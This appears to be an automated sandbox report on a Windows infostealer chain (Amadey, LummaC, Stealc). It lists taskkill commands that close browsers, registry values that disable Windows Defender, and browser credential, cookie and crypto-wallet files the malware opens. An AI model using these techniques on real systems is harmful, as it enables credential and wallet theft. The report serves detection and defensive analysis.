Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1001093001\num.exe "C:\Users\user~1\AppData\Local\Temp\1001093001\num.exe" Jump to behavior
Uses taskkill to terminate processes
Source: C:\Users\user\AppData\Local\Temp\1001092001\136916b3ff.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001092001\136916b3ff.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001092001\136916b3ff.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001092001\136916b3ff.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001092001\136916b3ff.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001092001\136916b3ff.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001092001\136916b3ff.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001092001\136916b3ff.exe Process created: C:\Windows\SysWOW64\taskkill.exe
Source: 136916b3ff.exe, 0000000F.00000002.1996242810.0000000000A12000.00000002.00000001.01000000.00000011.sdmp Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: 3BW8PCDTI0L77ZRRJ1.exe, 00000006.00000002.1780337753.00000000005E8000.00000040.00000001.01000000.0000000A.sdmp, 8138ba21a1.exe, 0000000A.00000002.1813757219.0000000000647000.00000040.00000001.01000000.0000000F.sdmp Binary or memory string: Program Manager
Source: skotes.exe, skotes.exe, 00000009.00000002.1770858812.00000000007AA000.00000040.00000001.01000000.0000000B.sdmp Binary or memory string: O.Program Manager
Source: J2IWSCR5FJAMGGW2VC4ET4.exe, J2IWSCR5FJAMGGW2VC4ET4.exe, 00000004.00000002.1688949555.0000000000865000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: RProgram Manager
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\J2IWSCR5FJAMGGW2VC4ET4.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1001092001\136916b3ff.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1001092001\136916b3ff.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1001093001\num.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1001093001\num.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1001093001\num.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1001093001\num.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\H8LKYZRGA2T6H9I76LLUOB7IB07Z.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings
barindex
Disable Windows Defender notifications (registry)
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications DisableNotifications 1 Jump to behavior
Disable Windows Defender real time protection (registry)
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Registry value created: DisableIOAVProtection 1 Jump to behavior
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Registry value created: DisableRealtimeMonitoring 1 Jump to behavior
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications Registry value created: DisableNotifications 1 Jump to behavior
Disables Windows Defender Tamper protection
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Registry value created: TamperProtection 0 Jump to behavior
Modifies windows update settings
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AUOptions Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AutoInstallMinorUpdates Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate DoNotConnectToWindowsUpdateInternetLocations Jump to behavior
AV process strings found (often used to terminate AV products)
Source: file.exe, 00000000.00000003.1492941083.000000000598E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1498095593.000000000120B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1573396537.000000000598E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1504577527.000000000598E000.00000004.00000800.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.2116513162.00000000011B4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Users\user\Desktop\file.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information
barindex
Yara detected Amadeys stealer DLL
Source: Yara match File source: 39.2.5VHE3T5UQF0Q17ZEPUURN3ZOS.exe.f80000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.skotes.exe.5c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.skotes.exe.5c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.G4X9C8XP66LPZY0PX2HHB5N.exe.590000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000009.00000002.1769530723.00000000005C1000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000002.2252074672.0000000000F81000.00000040.00000001.01000000.0000001C.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.1589647149.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.1688666080.00000000005C1000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000003.2208281116.0000000005340000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.1647906928.0000000005120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.1646501442.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.1635679717.0000000000591000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.1729250008.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Yara detected Credential Flusher
Source: Yara match File source: Process Memory Space: 136916b3ff.exe PID: 5936, type: MEMORYSTR
Yara detected LummaC Stealer
Source: Yara match File source: Process Memory Space: file.exe PID: 7412, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 8138ba21a1.exe PID: 2276, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Yara detected Stealc
Source: Yara match File source: 38.2.num.exe.360000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 30.2.num.exe.360000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.bd214fbd32.exe.50000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.2.bd214fbd32.exe.50000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 30.0.num.exe.360000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 40.2.H8LKYZRGA2T6H9I76LLUOB7IB07Z.exe.290000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 38.0.num.exe.360000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.J2IWSCR5FJAMGGW2VC4ET4.exe.470000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000028.00000003.2232897578.0000000004D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000002.2122542040.0000000000E1B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.2204680334.0000000000361000.00000080.00000001.01000000.00000014.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.1985396722.0000000000361000.00000080.00000001.01000000.00000014.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000002.2323652564.0000000000291000.00000040.00000001.01000000.0000001D.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.2029327781.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1883606041.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.1600676886.0000000004E50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.2207625905.0000000000F87000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.1688670034.0000000000471000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.1690398993.000000000111E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000000.2182412308.0000000000361000.00000080.00000001.01000000.00000014.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.1987795463.000000000112E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.1927559885.0000000000D2E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000000.1970036309.0000000000361000.00000080.00000001.01000000.00000014.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.1923946896.0000000000051000.00000040.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000002.2116759682.0000000000051000.00000040.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: J2IWSCR5FJAMGGW2VC4ET4.exe PID: 7932, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: bd214fbd32.exe PID: 4864, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\num[1].exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\1001093001\num.exe, type: DROPPED
Source: Yara match File source: dump.pcap, type: PCAP
Found many strings related to Crypto-Wallets (likely being stolen)
Source: file.exe, 00000000.00000003.1431421560.00000000011F4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Wallets/Electrum-LTC
Source: file.exe, 00000000.00000003.1431421560.00000000011F4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %appdata%\ElectronCash\wallets!
Source: file.exe String found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
Source: 8138ba21a1.exe, 00000012.00000003.2084529738.0000000001193000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: window-state.json
Source: file.exe String found in binary or memory: ExodusWeb3
Source: file.exe, 00000000.00000003.1431421560.00000000011F4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %appdata%\Ethereum
Source: file.exe String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: file.exe String found in binary or memory: keystore
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\formhistory.sqlite
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\prefs.js
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cert9.db
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
